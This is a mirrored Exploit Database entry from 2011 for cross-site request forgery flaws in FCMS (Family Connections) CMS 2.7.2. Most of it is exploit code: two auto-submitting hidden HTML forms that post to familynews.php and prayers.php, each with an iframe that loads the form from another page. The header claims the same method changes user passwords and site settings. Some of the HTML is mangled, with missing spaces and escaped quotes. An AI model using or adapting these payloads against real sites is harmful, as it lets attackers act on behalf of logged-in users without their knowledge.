FCMS CMS 2.7.2 – Multiple Cross-Site Request Forgery Vulnerabilities

• Exploit Database
• 109 阅读

• 作者： Ahmed Elhady Mohamed
  日期： 2011-12-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18232/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94

  FCMS_2.7.2 cms and earlier multiple CSRF Vulnerability =================================================================================== # Exploit Title: FCMS_2.7.2 cms multiple CSRF Vulnerability   Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.7.2/FCMS_2.7.2.zip/download   # Author: Ahmed Elhady Mohamed   #version : 2.7.2   # Category:: webapps   # Tested on: windows XP Sp2 En   # This vulnerability allows a malicious hacker to change password of a user and also it allows changing the website information. ===================================================================================       #First we must install all optional sections during installation process.   #there are csrf in all sections in this application for examples you can add news , pray for , change the password and can do all functionalities are there. #here are some examples for prove of concept   #########################################exploit code for Page "familynews.php"################################################ #Save the following codr in a file called "code.html"   <html> <head> <script type="text/javascript"> function autosubmit() { document.getElementById(&apos;ChangeSubmit&apos;).submit(); } </script> </head> <bodyonLoad="autosubmit()"> <form method="POST"action="http://127.0.0.1/FCMS_2.7.2/FCMS_2.7.2/familynews.php"id="ChangeSubmit"> <input type="hidden"name="title"value="test" /> <input type="hidden"name="submitadd"value="Add" /> <input type="hidden"name="post"value="testcsrf" /> <input type="submit" value="submit"/> </form> </body> </html>     #then i called "code.html" from another page   <html> <body> <iframesrc="https://www.exploit-db.com/exploits/18232/code.html" onLoad=""></iframe> </body> </html>     ###########################################exploit code for Page "prayers.php" #################################################### #Save the following code in a file called "code.html" <html> <head> <script type="text/javascript"> function autosubmit() { document.getElementById(&apos;ChangeSubmit&apos;).submit(); } </script> </head> <bodyonLoad="autosubmit()"> <form method="POST"action="http://127.0.0.1/FCMS_2.7.2/FCMS_2.7.2/prayers.php" id="ChangeSubmit"> <input type="hidden"name="for"value="test" /> <input type="hidden"name="submitadd"value="Add" /> <input type="hidden"name="desc"value="testtest" /> <input type="submit" value="submit"/> </form> </body> </html> #then i called "code.html" from another page   <html> <body> <iframesrc="https://www.exploit-db.com/exploits/18232/code.html" onLoad=""></iframe> </body> </html>     ##############################################################################################################################